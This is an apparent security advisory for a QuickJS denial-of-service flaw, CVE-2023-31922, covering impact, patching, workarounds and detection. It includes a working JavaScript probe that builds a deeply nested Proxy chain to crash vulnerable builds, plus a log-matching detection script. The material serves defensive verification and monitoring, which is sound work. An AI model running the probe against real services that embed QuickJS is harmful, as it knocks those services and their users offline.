CVE-2023-31922

7.5 HIGH (CVSS v3.1 AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H: availability impact only)

📋 TL;DR

CVE-2023-31922 is a native stack exhaustion (unbounded recursion) in the js_proxy_isArray function of QuickJS's quickjs.c. Array.isArray() on a Proxy must look through to the proxy's target; QuickJS implements this as JS_IsArray calling js_proxy_isArray, which calls JS_IsArray on the target, and so on, with no depth check in the vulnerable revision. A short script that wraps an array in a few hundred thousand nested Proxy objects therefore overruns the C stack and kills the process that hosts the engine. The impact is denial of service; the CVSS 7.5 score reflects availability only. Any application that embeds QuickJS and evaluates untrusted or third-party JavaScript is exposed.

💻 Affected Systems

Products:
  • QuickJS JavaScript Engine
Versions: The 2021-03-27 release (commit 2788d71, the revision the CVE was filed against) and all earlier revisions. Note that 2788d71 is the vulnerable commit, not the fix.
Operating Systems: All platforms where QuickJS runs (Linux, Windows, macOS, etc.)
Default Config Vulnerable: ⚠️ Yes
Notes: Any application embedding QuickJS or using it as a JavaScript runtime is affected if it is built from a vulnerable revision. Runtime limits the embedder may already set (JS_SetMemoryLimit, JS_SetMaxStackSize) do not help: the engine's stack limit is enforced by js_check_stack_overflow(), and the vulnerable js_proxy_isArray never calls it.

📦 What is this software?

QuickJS is a small, embeddable JavaScript engine written in C by Fabrice Bellard. It ships as source (quickjs.c plus a few companion files) that host applications compile in to get a scripting runtime, together with a standalone qjs interpreter.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Deterministic crash of the process that hosts the engine. The fault is native stack exhaustion from unbounded recursion, not a buffer overwrite, so on platforms with stack guard pages it is not a realistic path to code execution, and the CVSS vector scores availability only (C:N/I:N/A:H). If the host process also serves other tenants or requests, all of them go down with it.

🟠

Likely Case

A few lines of JavaScript (a deeply nested Proxy chain passed to Array.isArray) terminate the embedding application with SIGSEGV. Because the trigger is ordinary, valid JavaScript, it passes syntactic filtering; if the same job is retried on restart, the result is a crash loop.

🟢

If Mitigated

Contained crash: if untrusted scripts run in a separate, short-lived worker process and the service's own state lives elsewhere, a malicious script only costs one worker and the job is reported as failed.

🌐 Internet-Facing: HIGH - QuickJS is embedded in products that evaluate user-supplied scripts (plugins, rules engines, serverless-style runtimes), where attacker-controlled JavaScript is the normal input.
🏢 Internal Only: MEDIUM - Internal applications using QuickJS remain vulnerable to any script they evaluate, including scripts from a compromised internal user or a poisoned plugin repository.

🎯 Exploit Status

Public PoC: ⚠️ Yes (upstream issue #178)
Weaponized: LIKELY - the trigger is a handful of lines of JavaScript, so no further tooling is needed
Unauthenticated Exploit: ⚠️ Yes, wherever the embedding application evaluates attacker-supplied script without prior authentication
Complexity: LOW

The vulnerability is in a core engine function and is triggered by valid JavaScript: build a chain of nested Proxy objects and call Array.isArray() on it. The public GitHub issue demonstrates the crash condition.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Upstream releases after 2021-03-27. The fix adds a js_check_stack_overflow() call at the top of js_proxy_isArray, so a deeply nested proxy chain now ends in a thrown InternalError ("stack overflow") instead of a crash. Commit 2788d71 is the vulnerable revision named in the CVE, not the fix.

Upstream Issue (QuickJS publishes no separate advisory): https://github.com/bellard/quickjs/issues/178

Restart Required: Yes

Instructions:

1. Update QuickJS to a release newer than 2021-03-27 from the official repository, and confirm that js_proxy_isArray in quickjs.c contains the js_check_stack_overflow() check.
2. Recompile every application that links or vendors QuickJS against the updated source.
3. Restart the affected services.

🔧 Temporary Workarounds

Input Validation

all

Input validation is a weak control here: the trigger is syntactically ordinary JavaScript (a loop that wraps an array in Proxy objects, then a call to Array.isArray), so pattern matching on source text is easily evaded. Use it only to reject obviously hostile scripts, never as the primary mitigation.

Memory Limit Configuration

all

JS_SetMaxStackSize() and JS_SetMemoryLimit() do not stop this recursion, because the unpatched js_proxy_isArray never consults the engine's stack limit. If you cannot move to a fixed release, backport the upstream change (a js_check_stack_overflow() call at the top of js_proxy_isArray that throws instead of recursing) into your vendored quickjs.c and rebuild.

🧯 If You Can't Patch

  • Evaluate untrusted scripts in a separate, disposable worker process (a subprocess with resource limits) and treat a SIGSEGV exit as a failed job, so one malicious script cannot take down the long-lived service
  • Isolate QuickJS execution in containers or sandboxes with limited privileges
  • Implement network segmentation to limit who can submit scripts to systems using QuickJS

🔍 How to Verify

Check if Vulnerable:

Check the QuickJS release date or commit. A build at the 2021-03-27 release or earlier is vulnerable. In a git checkout: cat VERSION (prints the release date) or git log -1 --format=%H. A history that contains 2788d71 is not evidence of the fix, since that is the vulnerable revision. The decisive check is the function itself: grep -n -A 8 'static int js_proxy_isArray' quickjs.c must show a js_check_stack_overflow call before the return into JS_IsArray.

Check Version:

For compiled applications: strings binary_name | grep -i 'QuickJS version' prints the release date baked in as CONFIG_VERSION if the binary includes the qjs command-line front end; for an embedding application that does not, check its build configuration or the vendored quickjs.c as above.

Verify Fix Applied:

Confirm that the running binary was built from source whose js_proxy_isArray contains the js_check_stack_overflow check, then run a nested-proxy probe in a disposable process: a fixed build throws InternalError: stack overflow and keeps running, while a vulnerable build is killed with SIGSEGV.
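The probe described above, as an added check script that is not part of the advisory or of the QuickJS project. It relies on the recursion the CVE describes (js_proxy_isArray calls JS_IsArray on the proxy target, which re-enters js_proxy_isArray when that target is itself a proxy); DEPTH and the function names are constructed for this script. Run it in a throwaway process with qjs probe.js: a vulnerable build prints the shallow-chain line and then dies with SIGSEGV, a fixed build prints "guarded". It also runs under Node, where V8 caps proxy nesting and throws a RangeError, so the result there is "guarded" as well.

```javascript
// Added probe for CVE-2023-31922 (not the advisory's or the project's code).
// Array.isArray() on a Proxy must look through to the target; in QuickJS this
// is JS_IsArray -> js_proxy_isArray -> JS_IsArray ..., one pair of native
// frames per nesting level, with no depth check before the fix. DEPTH is a
// constructed value: large enough to exceed a default 8 MiB native stack,
// small enough to allocate in well under a second.
const DEPTH = 300000;

// Build proxy -> proxy -> ... -> [] with `depth` levels of wrapping.
function buildProxyChain(depth) {
  let target = [];
  for (let i = 0; i < depth; i++) {
    target = new Proxy(target, {});
  }
  return target;
}

// Outcomes:
//   "guarded"   - the engine threw instead of recursing to death
//                 (fixed QuickJS: InternalError "stack overflow";
//                  V8/Node: RangeError "Maximum call stack size exceeded")
//   "unguarded" - the call completed, i.e. the engine had enough stack; raise
//                 DEPTH if you see this on a build you believe is vulnerable
// A vulnerable QuickJS never returns: the process is killed with SIGSEGV.
function probeProxyIsArray(depth = DEPTH) {
  const chain = buildProxyChain(depth);
  try {
    return Array.isArray(chain) ? "unguarded" : "unexpected";
  } catch (e) {
    return "guarded";
  }
}

// Control: a shallow chain must still be classified as an array, which shows
// the probe exercises the proxy look-through path at all.
function shallowIsArray() {
  return Array.isArray(buildProxyChain(3));
}

// console.log exists both in the qjs interpreter and in Node.
console.log("shallow chain is array:", shallowIsArray());
console.log("probe result:", probeProxyIsArray());
```

The shallow control line is printed first on purpose: if the process dies before "probe result" appears, the crash happened inside Array.isArray on the deep chain, which is exactly the vulnerable path.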

📡 Detection & Monitoring

Log Indicators:

  • Host process crashes with SIGSEGV (kernel "segfault at" reports, supervisor exits with status=11/SEGV) immediately after a script evaluation starts
  • "InternalError: stack overflow" errors logged by the application on a fixed build: the payload was delivered and contained, which is still worth alerting on
  • Abnormal termination or restart loops of the processes that embed QuickJS

Network Indicators:

  • Submitted scripts that construct long chains of Proxy objects or are unusually large for the job type; treat the content as a weak signal only, since the trigger is valid JavaScript

SIEM Query:

(process_name:"quickjs" OR process_name:"qjs" OR process_name:"<your-embedding-service>") AND (event_type:"crash" OR signal:"SIGSEGV" OR error_message:"stack overflow")
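The same detection logic run over constructed log lines, as an added example that is not part of the advisory. It separates the two footprints this CVE leaves: a native crash of a QuickJS host (the vulnerable outcome) and a caught "stack overflow" error on a fixed build (the payload arrived but was contained). The process names, the watch list and every log line are constructed for illustration; substitute the names of your own embedding services.

```javascript
// Added example (not part of the advisory): classify log lines for the two
// footprints CVE-2023-31922 leaves. On an unpatched build the payload kills the
// host process (kernel segfault report, supervisor SIGSEGV exit); on a patched
// build the same payload surfaces as a caught InternalError "stack overflow".
// Process names and log lines are constructed for illustration.
const WATCHED_PROCESSES = ["qjs", "script-runner"]; // assumed QuickJS hosts

const SAMPLE_LOGS = [
  "Mar 12 10:01:02 host kernel: qjs[2231]: segfault at 7ffd3a1fefe8 ip 000055e4c12ab3c4 sp 00007ffd3a1fefd0 error 6 in qjs[55e4c1200000+1b0000]",
  "Mar 12 10:01:02 host systemd[1]: script-runner.service: Main process exited, code=killed, status=11/SEGV",
  "Mar 12 10:05:44 host script-runner[2299]: job 8812 failed: InternalError: stack overflow",
  "Mar 12 10:06:10 host script-runner[2299]: job 8813 completed in 12ms",
  "Mar 12 10:07:30 host kernel: chromium[310]: segfault at 0 ip 000056112a3b0f10 sp 00007ffe1c2a9e40 error 4 in chromium[56112a000000+8000000]",
];

// Linux kernel segfault report: "<comm>[<pid>]: segfault at <addr> ...".
const KERNEL_SEGFAULT_RE = /kernel: ([\w.-]+)\[(\d+)\]: segfault at /;
// systemd unit whose main process was killed by SIGSEGV (signal 11).
const SYSTEMD_SEGV_RE = /systemd\[\d+\]: ([\w.-]+)\.service: Main process exited, code=killed, status=11\/SEGV/;
// Engine-level error logged by the application itself: the guarded outcome
// (QuickJS wording first, V8 wording second for mixed fleets).
const GUARDED_RE = /([\w.-]+)\[(\d+)\]: .*\b(InternalError: stack overflow|RangeError: Maximum call stack size exceeded)/;

// Returns { kind, process, pid } for a line that matches one signature, else null.
function classifyLine(line) {
  let m;
  if ((m = KERNEL_SEGFAULT_RE.exec(line))) {
    return { kind: "native_crash", process: m[1], pid: Number(m[2]) };
  }
  if ((m = SYSTEMD_SEGV_RE.exec(line))) {
    return { kind: "native_crash", process: m[1], pid: null };
  }
  if ((m = GUARDED_RE.exec(line))) {
    return { kind: "guarded_overflow", process: m[1], pid: Number(m[2]) };
  }
  return null;
}

// Count hits for watched processes only: the chromium segfault above is a real
// crash but not a QuickJS host, so the watch list drops it.
function summarize(lines, watched = WATCHED_PROCESSES) {
  const counts = { native_crash: 0, guarded_overflow: 0 };
  const hits = [];
  for (const line of lines) {
    const c = classifyLine(line);
    if (c === null || !watched.includes(c.process)) continue;
    counts[c.kind] += 1;
    hits.push(c);
  }
  return { counts, hits };
}

console.log(JSON.stringify(summarize(SAMPLE_LOGS), null, 2));
```

A native_crash hit on a QuickJS host right after a script submission is the primary alert; a guarded_overflow hit means the fix is in place but someone is sending the payload, which is worth correlating with the submitting client.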

🔗 References

  • Upstream issue: https://github.com/bellard/quickjs/issues/178
  • NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2023-31922